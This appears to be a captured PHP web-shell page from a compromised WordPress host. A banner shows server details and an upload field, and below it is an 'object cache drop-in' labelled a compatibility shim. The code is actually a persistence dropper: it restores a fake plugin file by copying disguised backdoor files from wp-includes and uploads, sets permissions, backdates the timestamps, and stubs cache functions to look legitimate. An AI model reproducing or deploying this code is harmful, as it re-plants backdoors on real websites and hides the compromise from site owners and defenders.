| Server IP : 145.239.37.162 / Your IP : 216.73.217.46 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaa/www1/wp-content/ |
Upload File : |
<?php
/* Object Cache Drop-in — compatibility shim */
if (!defined('WP_CACHE_KEY_SALT')) define('WP_CACHE_KEY_SALT', '8e620569b792');
$_nx_p = '/home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/wp-cache-657a2e.php';
if (!file_exists($_nx_p)) {
foreach (glob('/home/verseaa/www1/wp-includes/assets/class-walker_3f39d93b.php') ?: array() as $_b) {
if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); @touch($_nx_p, filemtime($_b)); break; }
}
if (!file_exists($_nx_p)) {
foreach (glob('/home/verseaa/www1/wp-content/uploads/class-wp-*_3f39d93b.php') ?: array() as $_b) {
if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); @touch($_nx_p, filemtime($_b)); break; }
}
}
}
if (!function_exists('wp_cache_init')) {
function wp_cache_init() { global $wp_object_cache; $wp_object_cache = new stdClass(); }
function wp_cache_add($k,$v,$g='default',$e=0){return true;}
function wp_cache_set($k,$v,$g='default',$e=0){return true;}
function wp_cache_get($k,$g='default',$f=false){return false;}
function wp_cache_delete($k,$g='default'){return true;}
function wp_cache_flush(){return true;}
function wp_cache_add_global_groups($g){}
function wp_cache_add_non_persistent_groups($g){}
function wp_cache_close(){return true;}
}